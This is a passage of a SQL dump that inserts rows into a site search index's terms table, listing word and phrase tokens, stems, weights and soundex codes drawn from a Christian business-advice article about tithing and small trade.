(238735, 'grand', 'grand', 0, 0, 0.3333, 'G653', 1, '*'),
(238736, 'grand think', 'grand think', 0, 1, 1.3667, 'G65352', 1, '*'),
(238737, 'grand think and', 'grand think and', 0, 1, 1.5, 'G6535253', 1, '*'),
(238738, 'ground that', 'ground that', 0, 1, 1.3667, 'G653', 1, '*'),
(238739, 'ground that you', 'ground that you', 0, 1, 1.5, 'G653', 1, '*'),
(238740, 'groundnut', 'groundnut', 0, 0, 0.6, 'G65353', 1, '*'),
(238741, 'groundnut in', 'groundnut in', 0, 1, 1.4, 'G653535', 1, '*'),
(238742, 'groundnut in five-naira', 'groundnut in five-naira', 0, 1, 1.7667, 'G653535156', 1, '*'),
(238743, 'groundnut it', 'groundnut it', 0, 1, 1.4, 'G65353', 1, '*'),
(238744, 'groundnut it is', 'groundnut it is', 0, 1, 1.5, 'G653532', 1, '*'),
(238745, 'groundnut like', 'groundnut like', 0, 1, 1.4667, 'G6535342', 1, '*'),
(238746, 'groundnut like homemade', 'groundnut like homemade', 0, 1, 1.7667, 'G653534253', 1, '*'),
(238747, 'groundnut spread', 'groundnut spread', 0, 1, 1.5333, 'G653532163', 1, '*'),
(238748, 'groundnut spread and', 'groundnut spread and', 0, 1, 1.6667, 'G65353216353', 1, '*'),
(238749, 'groundnut think', 'groundnut think', 0, 1, 1.5, 'G6535352', 1, '*'),
(238750, 'groundnut think big', 'groundnut think big', 0, 1, 1.6333, 'G653535212', 1, '*'),
(238751, 'grows wider', 'grow wider', 0, 1, 1.3667, 'G6236', 1, '*'),
(238752, 'grows wider you', 'grow wider you', 0, 1, 1.5, 'G6236', 1, '*'),
(238753, 'harvest how', 'harvest how', 0, 1, 1.3667, 'H6123', 1, '*'),
(238754, 'harvest how you', 'harvest how you', 0, 1, 1.5, 'H6123', 1, '*'),
(238755, 'has earmarked', 'ha earmarked', 0, 1, 1.4333, 'H265623', 1, '*'),
(238756, 'has earmarked for', 'ha earmarked for', 0, 1, 1.5667, 'H26562316', 1, '*'),
(238757, 'have a paying', 'have a paying', 0, 1, 1.4333, 'H152', 1, '*'),
(238758, 'have done is', 'have done is', 0, 1, 1.4, 'H1352', 1, '*'),
(238759, 'have drawn', 'have drawn', 0, 1, 1.3333, 'H1365', 1, '*'),
(238760, 'have drawn a', 'have drawn a', 0, 1, 1.4, 'H1365', 1, '*'),
(238761, 'have the common', 'have the common', 0, 1, 1.5, 'H1325', 1, '*'),
(238762, 'having and', 'have and', 0, 1, 1.3333, 'H15253', 1, '*'),
(238763, 'having and even', 'have and even', 0, 1, 1.5, 'H1525315', 1, '*'),
(238764, 'he expects', 'he expects', 0, 1, 1.3333, 'H21232', 1, '*'),
(238765, 'he expects you', 'he expects you', 0, 1, 1.4667, 'H21232', 1, '*'),
(238766, 'heart on', 'heart on', 0, 1, 1.2667, 'H635', 1, '*'),
(238767, 'heart on the', 'heart on the', 0, 1, 1.4, 'H6353', 1, '*'),
(238768, 'help you 1', 'help you 1', 0, 1, 1.3333, 'H410', 1, '*'),
(238769, 'higher covenant', 'higher covenant', 0, 1, 1.5, 'H262153', 1, '*'),
(238770, 'higher covenant b', 'higher covenant b', 0, 1, 1.5667, 'H2621531', 1, '*'),
(238771, 'his people is', 'hi people is', 0, 1, 1.4333, 'H2142', 2, '*'),
(238772, 'holy spirit bring', 'holi spirit bring', 0, 1, 1.5667, 'H421631652', 1, '*'),
(238773, 'homemade', 'homemad', 0, 0, 0.5333, 'H530', 1, '*'),
(238774, 'homemade peanut', 'homemad peanut', 0, 1, 1.5, 'H53153', 1, '*'),
(238775, 'homemade peanut butter', 'homemad peanut butter', 0, 1, 1.7333, 'H53153136', 1, '*'),
(238776, 'honor', 'honor', 0, 0, 0.3333, 'H560', 1, '*'),
(238777, 'honor the', 'honor the', 0, 1, 1.3, 'H563', 1, '*'),
(238778, 'honor the lord', 'honor the lord', 0, 1, 1.4667, 'H563463', 1, '*'),
(238779, 'house of god', 'hous of god', 0, 1, 1.4, 'H2123', 1, '*'),
(238780, 'house so', 'hous so', 0, 1, 1.2667, 'H200', 1, '*'),
(238781, 'house so that', 'hous so that', 0, 1, 1.4333, 'H230', 1, '*'),
(238782, 'how to start', 'how to start', 0, 1, 1.4, 'H32363', 1, '*'),
(238783, 'how you start', 'how you start', 0, 1, 1.4333, 'H2363', 1, '*'),
(238784, 'idea at', 'idea at', 0, 1, 1.2333, 'I300', 1, '*'),
(238785, 'idea at a', 'idea at a', 0, 1, 1.3, 'I300', 1, '*'),
(238786, 'idea at this', 'idea at this', 0, 1, 1.4, 'I320', 1, '*'),
(238787, 'idea because', 'idea because', 0, 1, 1.4, 'I312', 1, '*'),
(238788, 'idea because it', 'idea because it', 0, 1, 1.5, 'I3123', 1, '*'),
(238789, 'idea from', 'idea from', 0, 1, 1.3, 'I3165', 1, '*'),
(238790, 'idea from god', 'idea from god', 0, 1, 1.4333, 'I316523', 1, '*'),
(238791, 'idea from the', 'idea from the', 0, 1, 1.4333, 'I31653', 1, '*'),
(238792, 'idea from your', 'idea from your', 0, 1, 1.4667, 'I31656', 1, '*'),
(238793, 'idea he', 'idea he', 0, 1, 1.2333, 'I300', 1, '*'),
(238794, 'idea he expects', 'idea he expects', 0, 1, 1.5, 'I321232', 1, '*'),
(238795, 'idea let your', 'idea let your', 0, 1, 1.4333, 'I3436', 1, '*'),
(238796, 'idea on', 'idea on', 0, 1, 1.2333, 'I350', 1, '*'),
(238797, 'idea on groundnut', 'idea on groundnut', 0, 1, 1.5667, 'I35265353', 1, '*'),
(238798, 'idea that you', 'idea that you', 0, 1, 1.4333, 'I300', 1, '*'),
(238799, 'ifyou', 'ifyou', 0, 0, 0.3333, 'I100', 1, '*'),
(238800, 'ifyou workout', 'ifyou workout', 0, 1, 1.4333, 'I1623', 1, '*'),
(238801, 'ifyou workout the', 'ifyou workout the', 0, 1, 1.5667, 'I1623', 1, '*'),
(238802, 'ii chronicles', 'ii chronicles', 0, 1, 1.4333, 'I265242', 1, '*'),
(238803, 'ii chronicles 31', 'ii chronicles 31', 0, 1, 1.5333, 'I265242', 1, '*'),
(238804, 'impartation', 'impart', 0, 0, 0.7333, 'I51635', 1, '*'),
(238805, 'impartation for', 'impart for', 0, 1, 1.5, 'I5163516', 1, '*'),
(238806, 'impartation for your', 'impart for your', 0, 1, 1.6667, 'I5163516', 1, '*'),
(238807, 'importantly', 'importantli', 0, 0, 0.7333, 'I5163534', 1, '*'),
(238808, 'importantly you', 'importantli you', 0, 1, 1.5, 'I5163534', 1, '*'),
(238809, 'importantly you take', 'importantli you take', 0, 1, 1.6667, 'I516353432', 1, '*'),
(238810, 'in a global', 'in a global', 0, 1, 1.3667, 'I52414', 1, '*'),
(238811, 'in abundance', 'in abundance', 0, 1, 1.4, 'I515352', 1, '*'),
(238812, 'in abundance 8', 'in abundance 8', 0, 1, 1.4667, 'I515352', 1, '*'),
(238813, 'in finding', 'in finding', 0, 1, 1.3333, 'I515352', 1, '*'),
(238814, 'in finding out', 'in finding out', 0, 1, 1.4667, 'I5153523', 1, '*'),
(238815, 'in five-naira', 'in five-naira', 0, 1, 1.4333, 'I5156', 1, '*'),
(238816, 'in five-naira transparent', 'in five-naira transparent', 0, 1, 1.8333, 'I515636521653', 1, '*'),
(238817, 'in god you', 'in god you', 0, 1, 1.3333, 'I523', 1, '*'),
(238818, 'in god\'s', 'in god', 0, 1, 1.2667, 'I5232', 3, '*'),
(238819, 'in god\'s kingdom', 'in god kingdom', 0, 1, 1.5333, 'I52325235', 1, '*'),
(238820, 'in prayer and', 'in prayer and', 0, 1, 1.4333, 'I51653', 2, '*'),
(238821, 'in prayer before', 'in prayer before', 0, 1, 1.5333, 'I51616', 1, '*'),
(238822, 'in searching', 'in searching', 0, 1, 1.4, 'I526252', 1, '*'),
(238823, 'in searching for', 'in searching for', 0, 1, 1.5333, 'I52625216', 1, '*'),
(238824, 'in so that', 'in so that', 0, 1, 1.3333, 'I523', 1, '*'),
(238825, 'in the direction', 'in the direction', 0, 1, 1.5333, 'I536235', 1, '*'),
(238826, 'in the scope', 'in the scope', 0, 1, 1.4, 'I5321', 1, '*'),
(238827, 'in trial', 'in trial', 0, 1, 1.2667, 'I5364', 1, '*'),
(238828, 'in trial and', 'in trial and', 0, 1, 1.4, 'I536453', 1, '*'),
(238829, 'in your business', 'in your business', 0, 1, 1.5333, 'I561252', 1, '*'),
(238830, 'in-roads', 'in-road', 0, 0, 0.5333, 'I5632', 1, '*'),
(238831, 'in-roads or', 'in-road or', 0, 1, 1.3667, 'I56326', 1, '*'),
(238832, 'in-roads or attacks', 'in-road or attacks', 0, 1, 1.6333, 'I5632632', 1, '*'),
(238833, 'income', 'incom', 0, 0, 0.4, 'I525', 2, '*'),
(238834, 'income and', 'incom and', 0, 1, 1.3333, 'I5253', 1, '*'),
(238835, 'income and not', 'incom and not', 0, 1, 1.4667, 'I525353', 1, '*'),
(238836, 'income as', 'incom as', 0, 1, 1.3, 'I5252', 1, '*'),
(238837, 'income as a', 'incom as a', 0, 1, 1.3667, 'I5252', 1, '*'),
(238838, 'income it', 'incom it', 0, 1, 1.3, 'I5253', 1, '*'),
(238839, 'income it is', 'incom it is', 0, 1, 1.4, 'I52532', 1, '*'),
(238840, 'income that', 'incom that', 0, 1, 1.3667, 'I5253', 1, '*'),
(238841, 'income that you', 'incom that you', 0, 1, 1.5, 'I5253', 1, '*'),
(238842, 'increase of', 'increas of', 0, 1, 1.3667, 'I52621', 1, '*'),
(238843, 'increase of your', 'increas of your', 0, 1, 1.5333, 'I526216', 1, '*'),
(238844, 'increasing', 'increas', 0, 0, 0.6667, 'I526252', 2, '*'),
(238845, 'increasing promotion', 'increas promotion', 0, 1, 1.6667, 'I52625216535', 1, '*'),
(238846, 'increasing promotion c', 'increas promotion c', 0, 1, 1.7333, 'I526252165352', 1, '*'),
(238847, 'information', 'inform', 0, 0, 0.7333, 'I516535', 1, '*'),
(238848, 'information and', 'inform and', 0, 1, 1.5, 'I5165353', 1, '*'),
(238849, 'information and details', 'inform and details', 0, 1, 1.7667, 'I516535342', 1, '*'),
(238850, 'inspiration not', 'inspir not', 0, 1, 1.5, 'I5216353', 1, '*'),
(238851, 'inspiration not by', 'inspir not by', 0, 1, 1.6, 'I52163531', 1, '*'),
(238852, 'instructions to', 'instruct to', 0, 1, 1.5, 'I523623523', 1, '*'),
(238853, 'instructions to your', 'instruct to your', 0, 1, 1.6667, 'I5236235236', 1, '*'),
(238854, 'into your affairs', 'into your affairs', 0, 1, 1.5667, 'I536162', 1, '*'),
(238855, 'introduction god\'s', 'introduct god', 0, 1, 1.6, 'I5363235232', 1, '*'),
(238856, 'introduction god\'s expectation', 'introduct god expectation', 0, 1, 2, 'I53632352321235', 1, '*'),
(238857, 'involved in trial', 'involv in trial', 0, 1, 1.5667, 'I514135364', 1, '*'),
(238858, 'is 350', 'is 350', 0, 1, 1.2, 'I200', 1, '*'),
(238859, 'is 350 naira', 'is 350 naira', 0, 1, 1.4, 'I256', 1, '*'),
(238860, 'is a way', 'is a way', 0, 1, 1.2667, 'I200', 1, '*'),
(238861, 'is also a', 'is also a', 0, 1, 1.3, 'I242', 1, '*'),
(238862, 'is always crucial', 'is always crucial', 0, 1, 1.5667, 'I242624', 1, '*'),
(238863, 'is available', 'is available', 0, 1, 1.4, 'I21414', 2, '*'),
(238864, 'is available in', 'is available in', 0, 1, 1.5, 'I214145', 1, '*'),
(238865, 'is constant', 'is constant', 0, 1, 1.3667, 'I252353', 1, '*'),
(238866, 'is constant and', 'is constant and', 0, 1, 1.5, 'I25235353', 1, '*'),
(238867, 'is crucial do', 'is crucial do', 0, 1, 1.4333, 'I26243', 1, '*'),
(238868, 'is doing get', 'is doing get', 0, 1, 1.4, 'I23523', 1, '*'),
(238869, 'is established', 'is established', 0, 1, 1.4667, 'I231423', 1, '*'),
(238870, 'is established 2', 'is established 2', 0, 1, 1.5333, 'I231423', 1, '*'),
(238871, 'is famous', 'is famous', 0, 1, 1.3, 'I2152', 1, '*'),
(238872, 'is famous or', 'is famous or', 0, 1, 1.4, 'I21526', 1, '*'),
(238873, 'is having', 'is having', 0, 1, 1.3, 'I2152', 1, '*'),
(238874, 'is having and', 'is having and', 0, 1, 1.4333, 'I215253', 1, '*'),
(238875, 'is not enough', 'is not enough', 0, 1, 1.4333, 'I25352', 1, '*'),
(238876, 'is not for', 'is not for', 0, 1, 1.3333, 'I25316', 1, '*'),
(238877, 'is not negotiable', 'is not negotiable', 0, 1, 1.5667, 'I25352314', 1, '*'),
(238878, 'is powered', 'is powered', 0, 1, 1.3333, 'I2163', 1, '*'),
(238879, 'is powered from', 'is powered from', 0, 1, 1.5, 'I2163165', 1, '*'),
(238880, 'is rebuked', 'is rebuked', 0, 1, 1.3333, 'I26123', 1, '*'),
(238881, 'is rebuked for', 'is rebuked for', 0, 1, 1.4667, 'I2612316', 1, '*'),
(238882, 'is that you', 'is that you', 0, 1, 1.3667, 'I230', 1, '*'),
(238883, 'is what everybody', 'is what everybody', 0, 1, 1.5667, 'I231613', 1, '*'),
(238884, 'is your own', 'is your own', 0, 1, 1.3667, 'I265', 1, '*'),
(238885, 'it forth', 'it forth', 0, 1, 1.2667, 'I3163', 1, '*'),
(238886, 'it forth in', 'it forth in', 0, 1, 1.3667, 'I31635', 1, '*'),
(238887, 'it is constant', 'it is constant', 0, 1, 1.4667, 'I3252353', 1, '*'),
(238888, 'it is established', 'it is established', 0, 1, 1.5667, 'I3231423', 1, '*'),
(238889, 'it is famous', 'it is famous', 0, 1, 1.4, 'I32152', 1, '*'),
(238890, 'it is powered', 'it is powered', 0, 1, 1.4333, 'I32163', 1, '*'),
(238891, 'it well it\'s', 'it well it', 0, 1, 1.4, 'I3432', 1, '*'),
(238892, 'it while', 'it while', 0, 1, 1.2667, 'I340', 1, '*'),
(238893, 'it while you', 'it while you', 0, 1, 1.4, 'I340', 1, '*'),
(238894, 'it will ensure', 'it will ensure', 0, 1, 1.4667, 'I34526', 1, '*'),
(238895, 'it\'s going', 'it going', 0, 1, 1.3333, 'I3252', 1, '*'),
(238896, 'it\'s going global', 'it going global', 0, 1, 1.5667, 'I3252414', 1, '*'),
(238897, 'item 12', 'item 12', 0, 1, 1.2333, 'I350', 1, '*'),
(238898, 'item 12 business', 'item 12 business', 0, 1, 1.5333, 'I351252', 1, '*'),
(238899, 'jesus name let', 'jesu name let', 0, 1, 1.4667, 'J543', 1, '*'),
(238900, 'job or a', 'job or a', 0, 1, 1.2667, 'J160', 1, '*'),
(238901, 'job you', 'job you', 0, 1, 1.2333, 'J100', 1, '*'),
(238902, 'job you need', 'job you need', 0, 1, 1.4, 'J153', 1, '*'),
(238903, 'joke and', 'joke and', 0, 1, 1.2667, 'J530', 1, '*'),
(238904, 'joke and take', 'joke and take', 0, 1, 1.4333, 'J532', 1, '*'),
(238905, 'just pick', 'just pick', 0, 1, 1.3, 'J312', 1, '*'),
(238906, 'just pick a', 'just pick a', 0, 1, 1.3667, 'J312', 1, '*'),
(238907, 'k2 item 12', 'k2 item 12', 0, 1, 1.3333, 'K350', 1, '*'),
(238908, 'kingdom and', 'kingdom and', 0, 1, 1.3667, 'K52353', 1, '*'),
(238909, 'kingdom and there', 'kingdom and there', 0, 1, 1.5667, 'K523536', 1, '*'),
(238910, 'kingdom in', 'kingdom in', 0, 1, 1.3333, 'K5235', 1, '*'),
(238911, 'kingdom in jesus', 'kingdom in jesus', 0, 1, 1.5333, 'K52352', 1, '*'),
(238912, 'kingdom principles', 'kingdom principles', 0, 1, 1.6, 'K52351652142', 1, '*'),
(238913, 'kingdom principles and', 'kingdom principles and', 0, 1, 1.7333, 'K5235165214253', 1, '*'),
(238914, 'kingdom standards', 'kingdom standards', 0, 1, 1.5667, 'K52352353632', 1, '*'),
(238915, 'kingdom standards and', 'kingdom standards and', 0, 1, 1.7, 'K5235235363253', 1, '*'),
(238916, 'kingdom system', 'kingdom system', 0, 1, 1.4667, 'K5235235', 1, '*'),
(238917, 'kingdom system sowing', 'kingdom system sowing', 0, 1, 1.7, 'K5235235252', 1, '*'),
(238918, 'kingdom way', 'kingdom way', 0, 1, 1.3667, 'K5235', 1, '*'),
(238919, 'kingdom way with', 'kingdom way with', 0, 1, 1.5333, 'K52353', 1, '*'),
(238920, 'knows the future', 'know the future', 0, 1, 1.5333, 'K523136', 1, '*'),
(238921, 'labor with', 'labor with', 0, 1, 1.3333, 'L163', 1, '*'),
(238922, 'labor with multiple', 'labor with multiple', 0, 1, 1.6333, 'L16354314', 1, '*'),
(238923, 'last must', 'last must', 0, 1, 1.3, 'L23523', 1, '*'),
(238924, 'last must be', 'last must be', 0, 1, 1.4, 'L235231', 1, '*'),
(238925, 'lead you to', 'lead you to', 0, 1, 1.3667, 'L300', 1, '*'),
(238926, 'learn to run', 'learn to run', 0, 1, 1.4, 'L65365', 1, '*'),
(238927, 'legitimize', 'legitim', 0, 0, 0.6667, 'L2352', 1, '*'),
(238928, 'legitimize your', 'legitim your', 0, 1, 1.5, 'L23526', 1, '*'),
(238929, 'legitimize your business', 'legitim your business', 0, 1, 1.8, 'L235261252', 1, '*'),
(238930, 'lend', 'lend', 0, 0, 0.2667, 'L530', 1, '*'),
(238931, 'lend to', 'lend to', 0, 1, 1.2333, 'L530', 1, '*'),
(238932, 'lend to many', 'lend to many', 0, 1, 1.4, 'L535', 1, '*'),
(238933, 'let business', 'let business', 0, 1, 1.4, 'L31252', 1, '*'),
(238934, 'let business take', 'let business take', 0, 1, 1.5667, 'L3125232', 1, '*'),
(238935, 'let god give', 'let god give', 0, 1, 1.4, 'L32321', 1, '*'),
(238936, 'let god who', 'let god who', 0, 1, 1.3667, 'L323', 1, '*'),
(238937, 'let us consider', 'let us consider', 0, 1, 1.5, 'L325236', 1, '*'),
(238938, 'let your business', 'let your business', 0, 1, 1.5667, 'L361252', 1, '*'),
(238939, 'let your preparation', 'let your preparation', 0, 1, 1.6667, 'L36161635', 1, '*'),
(238940, 'level any', 'level any', 0, 1, 1.3, 'L145', 1, '*'),
(238941, 'level any business', 'level any business', 0, 1, 1.6, 'L1451252', 1, '*'),
(238942, 'level of god', 'level of god', 0, 1, 1.4, 'L14123', 1, '*'),
(238943, 'level of your', 'level of your', 0, 1, 1.4333, 'L1416', 3, '*'),
(238944, 'leviticus', 'leviticu', 0, 0, 0.6, 'L132', 1, '*'),
(238945, 'leviticus 27', 'leviticu 27', 0, 1, 1.4, 'L132', 1, '*'),
(238946, 'leviticus 27 30', 'leviticu 27 30', 0, 1, 1.5, 'L132', 1, '*'),
(238947, 'life because the', 'life because the', 0, 1, 1.5333, 'L123', 1, '*'),
(238948, 'life conclusion', 'life conclusion', 0, 1, 1.5, 'L1252425', 1, '*'),
(238949, 'life conclusion learn', 'life conclusion learn', 0, 1, 1.7, 'L1252425465', 1, '*'),
(238950, 'life through', 'life through', 0, 1, 1.4, 'L1362', 1, '*'),
(238951, 'life through multiple', 'life through multiple', 0, 1, 1.7, 'L136254314', 1, '*'),
(238952, 'lightly', 'lightli', 0, 0, 0.4667, 'L234', 2, '*'),
(238953, 'lightly your', 'lightli your', 0, 1, 1.4, 'L2346', 1, '*'),
(238954, 'lightly your spiritual', 'lightli your spiritual', 0, 1, 1.7333, 'L234621634', 1, '*'),
(238955, 'like homemade', 'like homemade', 0, 1, 1.4333, 'L253', 1, '*'),
(238956, 'like homemade peanut', 'like homemade peanut', 0, 1, 1.6667, 'L253153', 1, '*'),
(238957, 'limit yourself', 'limit yourself', 0, 1, 1.4667, 'L536241', 1, '*'),
(238958, 'limit yourself in', 'limit yourself in', 0, 1, 1.5667, 'L5362415', 1, '*'),
(238959, 'limiting', 'limit', 0, 0, 0.5333, 'L5352', 1, '*'),
(238960, 'limiting line', 'limit line', 0, 1, 1.4333, 'L535245', 1, '*'),
(238961, 'limiting line to', 'limit line to', 0, 1, 1.5333, 'L5352453', 1, '*'),
(238962, 'line', 'line', 0, 0, 0.2667, 'L500', 1, '*'),
(238963, 'line to', 'line to', 0, 1, 1.2333, 'L530', 1, '*'),
(238964, 'line to the', 'line to the', 0, 1, 1.3667, 'L530', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(238965, 'lord and let', 'lord and let', 0, 1, 1.4, 'L635343', 1, '*'),
(238966, 'lord don\'t', 'lord don', 0, 1, 1.3333, 'L6353', 1, '*'),
(238967, 'lord don\'t just', 'lord don just', 0, 1, 1.5, 'L635323', 1, '*'),
(238968, 'lord that will', 'lord that will', 0, 1, 1.4667, 'L634', 1, '*'),
(238969, 'lord wants', 'lord wants', 0, 1, 1.3333, 'L63532', 1, '*'),
(238970, 'lord wants you', 'lord wants you', 0, 1, 1.4667, 'L63532', 1, '*'),
(238971, 'lord with', 'lord with', 0, 1, 1.3, 'L630', 1, '*'),
(238972, 'lord with the', 'lord with the', 0, 1, 1.4333, 'L630', 1, '*'),
(238973, 'lt', 'lt', 0, 0, 0.1333, 'L300', 1, '*'),
(238974, 'lt secures', 'lt secures', 0, 1, 1.3333, 'L3262', 1, '*'),
(238975, 'lt secures your', 'lt secures your', 0, 1, 1.5, 'L32626', 1, '*'),
(238976, 'ltensures', 'ltensur', 0, 0, 0.6, 'L35262', 1, '*'),
(238977, 'ltensures increasing', 'ltensur increasing', 0, 1, 1.6667, 'L35262526252', 1, '*'),
(238978, 'ltensures increasing promotion', 'ltensur increasing promotion', 0, 1, 2, 'L3526252625216535', 1, '*'),
(238979, 'make from', 'make from', 0, 1, 1.3, 'M2165', 1, '*'),
(238980, 'make from groundnut', 'make from groundnut', 0, 1, 1.6333, 'M2165265353', 1, '*'),
(238981, 'make more', 'make more', 0, 1, 1.3, 'M256', 1, '*'),
(238982, 'make more room', 'make more room', 0, 1, 1.4667, 'M2565', 1, '*'),
(238983, 'make room', 'make room', 0, 1, 1.3, 'M265', 1, '*'),
(238984, 'make room for', 'make room for', 0, 1, 1.4333, 'M26516', 1, '*'),
(238985, 'make sure it', 'make sure it', 0, 1, 1.4, 'M263', 1, '*'),
(238986, 'make sure you', 'make sure you', 0, 1, 1.4333, 'M260', 1, '*'),
(238987, 'make you to', 'make you to', 0, 1, 1.3667, 'M230', 1, '*'),
(238988, 'man is having', 'man is having', 0, 1, 1.4333, 'M2152', 1, '*'),
(238989, 'man of god', 'man of god', 0, 1, 1.3333, 'M123', 3, '*'),
(238990, 'many nations', 'mani nations', 0, 1, 1.4, 'M352', 1, '*'),
(238991, 'many nations and', 'mani nations and', 0, 1, 1.5333, 'M35253', 1, '*'),
(238992, 'may you connect', 'mai you connect', 0, 1, 1.5, 'M2523', 1, '*'),
(238993, 'mediocre', 'mediocr', 0, 0, 0.5333, 'M326', 2, '*'),
(238994, 'mediocre level', 'mediocr level', 0, 1, 1.4667, 'M326414', 1, '*'),
(238995, 'mediocre level any', 'mediocr level any', 0, 1, 1.6, 'M3264145', 1, '*'),
(238996, 'mindset and', 'mindset and', 0, 1, 1.3667, 'M32353', 1, '*'),
(238997, 'mindset and dimension', 'mindset and dimension', 0, 1, 1.7, 'M32353525', 1, '*'),
(238998, 'money is', 'monei is', 0, 1, 1.2667, 'M200', 1, '*'),
(238999, 'money is your', 'monei is your', 0, 1, 1.4333, 'M260', 1, '*'),
(239000, 'more importantly', 'more importantly', 0, 1, 1.5333, 'M65163534', 1, '*'),
(239001, 'more importantly you', 'more importantly you', 0, 1, 1.6667, 'M65163534', 1, '*'),
(239002, 'more prayerful', 'more prayerful', 0, 1, 1.4667, 'M61614', 1, '*'),
(239003, 'more prayerful more', 'more prayerful more', 0, 1, 1.6333, 'M6161456', 1, '*'),
(239004, 'more room', 'more room', 0, 1, 1.3, 'M650', 1, '*'),
(239005, 'more room for', 'more room for', 0, 1, 1.4333, 'M6516', 1, '*'),
(239006, 'more sensitive', 'more sensitive', 0, 1, 1.4667, 'M625231', 1, '*'),
(239007, 'more sensitive and', 'more sensitive and', 0, 1, 1.6, 'M62523153', 1, '*'),
(239008, 'multiple streams', 'multipl streams', 0, 1, 1.5333, 'M431423652', 1, '*'),
(239009, 'multiple streams of', 'multipl streams of', 0, 1, 1.6333, 'M4314236521', 1, '*'),
(239010, 'must be thoroughly', 'must be thoroughly', 0, 1, 1.6, 'M2313624', 1, '*'),
(239011, 'naira', 'naira', 0, 0, 0.3333, 'N600', 1, '*'),
(239012, 'naira what', 'naira what', 0, 1, 1.3333, 'N630', 1, '*'),
(239013, 'naira what you', 'naira what you', 0, 1, 1.4667, 'N630', 1, '*'),
(239014, 'name let', 'name let', 0, 1, 1.2667, 'N430', 1, '*'),
(239015, 'name let us', 'name let us', 0, 1, 1.3667, 'N432', 1, '*'),
(239016, 'name of your', 'name of your', 0, 1, 1.4, 'N160', 3, '*'),
(239017, 'name your', 'name your', 0, 1, 1.3, 'N600', 1, '*'),
(239018, 'name your business', 'name your business', 0, 1, 1.6, 'N61252', 1, '*'),
(239019, 'names will', 'name will', 0, 1, 1.3333, 'N240', 1, '*'),
(239020, 'names will always', 'name will always', 0, 1, 1.5667, 'N242', 1, '*'),
(239021, 'nations and', 'nation and', 0, 1, 1.3667, 'N35253', 1, '*'),
(239022, 'nations and not', 'nation and not', 0, 1, 1.5, 'N3525353', 1, '*'),
(239023, 'natural man', 'natur man', 0, 1, 1.3667, 'N3645', 1, '*'),
(239024, 'natural man is', 'natur man is', 0, 1, 1.4667, 'N36452', 1, '*'),
(239025, 'necessary', 'necessari', 0, 0, 0.6, 'N260', 2, '*'),
(239026, 'necessary procedures', 'necessari procedures', 0, 1, 1.6667, 'N26162362', 1, '*'),
(239027, 'necessary procedures and', 'necessari procedures and', 0, 1, 1.8, 'N2616236253', 1, '*'),
(239028, 'necessary quarter', 'necessari quarter', 0, 1, 1.5667, 'N262636', 1, '*'),
(239029, 'necessary quarter 6', 'necessari quarter 6', 0, 1, 1.6333, 'N262636', 1, '*'),
(239030, 'negotiable', 'negoti', 0, 0, 0.6667, 'N2314', 1, '*'),
(239031, 'negotiable do', 'negoti do', 0, 1, 1.4333, 'N23143', 1, '*'),
(239032, 'negotiable do not', 'negoti do not', 0, 1, 1.5667, 'N2314353', 1, '*'),
(239033, 'no environmental', 'no environmental', 0, 1, 1.5333, 'N16534', 1, '*'),
(239034, 'no environmental condition', 'no environmental condition', 0, 1, 1.8667, 'N165342535', 1, '*'),
(239035, 'not allow or', 'not allow or', 0, 1, 1.4, 'N346', 1, '*'),
(239036, 'not assume', 'not assume', 0, 1, 1.3333, 'N325', 1, '*'),
(239037, 'not assume that', 'not assume that', 0, 1, 1.5, 'N3253', 1, '*'),
(239038, 'not borrow', 'not borrow', 0, 1, 1.3333, 'N316', 1, '*'),
(239039, 'not borrow they', 'not borrow they', 0, 1, 1.5, 'N3163', 1, '*'),
(239040, 'not by environmental', 'not by environmental', 0, 1, 1.6667, 'N31516534', 1, '*'),
(239041, 'not eat', 'not eat', 0, 1, 1.2333, 'N300', 1, '*'),
(239042, 'not eat your', 'not eat your', 0, 1, 1.4, 'N360', 1, '*'),
(239043, 'not enough to', 'not enough to', 0, 1, 1.4333, 'N3523', 1, '*'),
(239044, 'not ever', 'not ever', 0, 1, 1.2667, 'N316', 1, '*'),
(239045, 'not ever operate', 'not ever operate', 0, 1, 1.5333, 'N316163', 1, '*'),
(239046, 'not for you', 'not for you', 0, 1, 1.3667, 'N316', 1, '*'),
(239047, 'not get involved', 'not get involved', 0, 1, 1.5333, 'N32351413', 1, '*'),
(239048, 'not limit', 'not limit', 0, 1, 1.3, 'N3453', 1, '*'),
(239049, 'not limit yourself', 'not limit yourself', 0, 1, 1.6, 'N34536241', 1, '*'),
(239050, 'not negotiable', 'not negotiable', 0, 1, 1.4667, 'N352314', 1, '*'),
(239051, 'not negotiable do', 'not negotiable do', 0, 1, 1.5667, 'N3523143', 1, '*'),
(239052, 'not one', 'not one', 0, 1, 1.2333, 'N350', 1, '*'),
(239053, 'not one tenth', 'not one tenth', 0, 1, 1.4333, 'N35353', 1, '*'),
(239054, 'not spare', 'not spare', 0, 1, 1.3, 'N3216', 1, '*'),
(239055, 'not spare in', 'not spare in', 0, 1, 1.4, 'N32165', 1, '*'),
(239056, 'nothing can', 'noth can', 0, 1, 1.3667, 'N3525', 1, '*'),
(239057, 'nothing can eat', 'noth can eat', 0, 1, 1.5, 'N35253', 1, '*'),
(239058, 'nylon', 'nylon', 0, 0, 0.3333, 'N450', 1, '*'),
(239059, 'nylon and', 'nylon and', 0, 1, 1.3, 'N453', 1, '*'),
(239060, 'nylon and say', 'nylon and say', 0, 1, 1.4333, 'N4532', 1, '*'),
(239061, 'occultic attack', 'occult attack', 0, 1, 1.5, 'O243232', 1, '*'),
(239062, 'occultic attack be', 'occult attack be', 0, 1, 1.6, 'O2432321', 1, '*'),
(239063, 'occultic in-roads', 'occult in-roads', 0, 1, 1.5667, 'O24325632', 1, '*'),
(239064, 'occultic in-roads or', 'occult in-roads or', 0, 1, 1.6667, 'O243256326', 1, '*'),
(239065, 'of a kingdom', 'of a kingdom', 0, 1, 1.4, 'O125235', 1, '*'),
(239066, 'of abundance', 'of abundance', 0, 1, 1.4, 'O15352', 2, '*'),
(239067, 'of all forms', 'of all forms', 0, 1, 1.4, 'O141652', 1, '*'),
(239068, 'of divine flows', 'of divine flows', 0, 1, 1.5, 'O1315142', 1, '*'),
(239069, 'of god 7', 'of god 7', 0, 1, 1.2667, 'O123', 1, '*'),
(239070, 'of god b', 'of god b', 0, 1, 1.2667, 'O1231', 1, '*'),
(239071, 'of god excellence', 'of god excellence', 0, 1, 1.5667, 'O1232452', 1, '*'),
(239072, 'of god ifyou', 'of god ifyou', 0, 1, 1.4, 'O1231', 1, '*'),
